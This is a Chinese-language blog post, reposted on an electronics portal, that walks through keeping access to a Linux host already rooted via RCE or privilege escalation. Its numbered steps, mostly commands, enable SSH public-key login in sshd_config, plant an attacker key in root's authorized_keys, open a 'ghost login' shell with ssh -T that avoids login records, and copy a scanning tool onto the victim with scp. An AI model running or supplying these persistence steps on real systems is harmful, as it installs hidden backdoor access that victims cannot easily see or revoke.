0x00 前提
以前的老東西,拿出水一篇
一般是通過 Rce,提權(quán)等等情況,拿到目標(biāo) linux 的 root 權(quán)限
主要是沒有密碼, hash 跑不出來,機(jī)器無法正常出網(wǎng)
就可以去試著正向鏈接
0x01 首先目標(biāo)主機(jī),修改目標(biāo) Ssh 服務(wù)配置
啟用ssh證書登錄,并重啟SSH 服務(wù)
echo RSAAuthentication yes >> /etc/ssh/sshd_config echo PubkeyAuthentication yes >> /etc/ssh/sshd_config systemctl restart sshd
0x02 本地linux上生成密鑰
# ssh-keygen -t rsa -P "" -f ~/.ssh/id_rsa
注意:這一步最好去一個(gè)純凈的Linux生成,因?yàn)檫@個(gè)key會(huì)暴露你的主機(jī)名
//找見id_rsa.pub自行拷貝出來 ls -al /root/.ssh/ cp /root/.ssh/id_rsa.pub /home/xxxx/Desktop/ //賦于權(quán)限 chmod 777 /home/xxxx/Desktop/id_rsa.pub/root/.ssh/文件夾里面有倆文件:
id_rsa(私鑰) id_rsa.pub(公鑰)
0x03 linux目標(biāo)機(jī)寫入公鑰
自行上傳公鑰到內(nèi)網(wǎng)linux,并將其保存到/root/.ssh/目錄下,文件名改為authorized_keys,或者命令執(zhí)行用echo追加
如目標(biāo)已事先存在authorized_keys文件,直接往最后追加即可
注意:再操作之前要對(duì)原authorized_keys進(jìn)行“備份”,以備不時(shí)之需。
# echo ssh-rsa AAAAB3NzaC1yc2EAAAADAQABAAABgQC8Zrks74SYQ4JzKFvYPyL2tG+Scx/y/gIDk5znJF6XKjJ2MFS7RfsjKqpRk7bb+bDpgb5awiMzMOUgwBDheJKerji9/FD+jHEI133ejCZphiPL0+OItLdl7uUt+NFMMPNeXh9lmDOwApxVg54xhDjyzWYaV6xQgvWuZK+6qNBD1TW2/zXImeHpC+L37KQSgFvtxyOiYw/Uq/Caoa9VkcFsUsJ1ftmKSh7unkEJiJAHpzmI0SquNdrgTJ5AiVclQbTa8viyl+irXYjUyvxWKCqBhMhuQQFEMRdViVStgSRoVREEH361J7T7oCC0rJE2XV8MlejXZGi7if34gYHYgyBKvEQ9/Ff+fkQV5LXdZLkC0h3wOBLV9lWwMamlFSjJMTSBlZP1syHYV/X1YNO76SmLUUi48PwDQa52g0tI2TusDmjgARWxwhCndu463dwbCcGjfHnSEAWEB2WGJcKOcpfGLUrdDt9My/d26dfMTNdlaw+kdnDVlYvk0qnyBBZhyfE= [email protected] >> /root/.ssh/authorized_keys
0x04 幽靈登錄
ssh -T [email protected] /usr/bin/bash -i
0x05 利用Scp 無密碼互傳文件
scp -P 22 -r /root/fsacn [email protected]:/usr/tmp/fsacn審核編輯:湯梓紅
-
Linux
+關(guān)注
關(guān)注
87文章
11457瀏覽量
212772 -
主機(jī)
+關(guān)注
關(guān)注
0文章
1033瀏覽量
35802 -
公鑰
+關(guān)注
關(guān)注
0文章
22瀏覽量
12150 -
SSH
+關(guān)注
關(guān)注
0文章
193瀏覽量
16791 -
root
+關(guān)注
關(guān)注
1文章
86瀏覽量
21619
原文標(biāo)題:實(shí)戰(zhàn)|無密碼Linux主機(jī)利用公鑰直接連接
文章出處:【微信號(hào):菜鳥學(xué)信安,微信公眾號(hào):菜鳥學(xué)信安】歡迎添加關(guān)注!文章轉(zhuǎn)載請(qǐng)注明出處。
發(fā)布評(píng)論請(qǐng)先 登錄
藍(lán)牙連接主機(jī)可否直接連接保存的地址,不用每次掃描再連接?
git公鑰、私鑰使用經(jīng)驗(yàn)
mbedTLS設(shè)置已知公鑰的問題求解
【觸覺智能 Purple Pi OH 開發(fā)板體驗(yàn)】無網(wǎng)絡(luò)狀態(tài)連接ssh解決辦法
基于Chebyshev多項(xiàng)式的公鑰密碼系統(tǒng)算法
基于橢圓曲線的EIGamal加密體制的組合公鑰分析及應(yīng)用
用JAVA語(yǔ)言實(shí)現(xiàn)RSA公鑰密碼算法
公鑰密碼分析簡(jiǎn)介
如何使用生成的公鑰加密數(shù)據(jù)和私鑰解密數(shù)據(jù)
EE-385:用公鑰加速器實(shí)現(xiàn)RSA密碼系統(tǒng)

C -與ORACLE直接連接代碼

本源量子算力賦能公鑰密碼應(yīng)用
本源量子算力賦能公鑰密碼應(yīng)用

n公頭壓接連接器怎樣分辨好壞

評(píng)論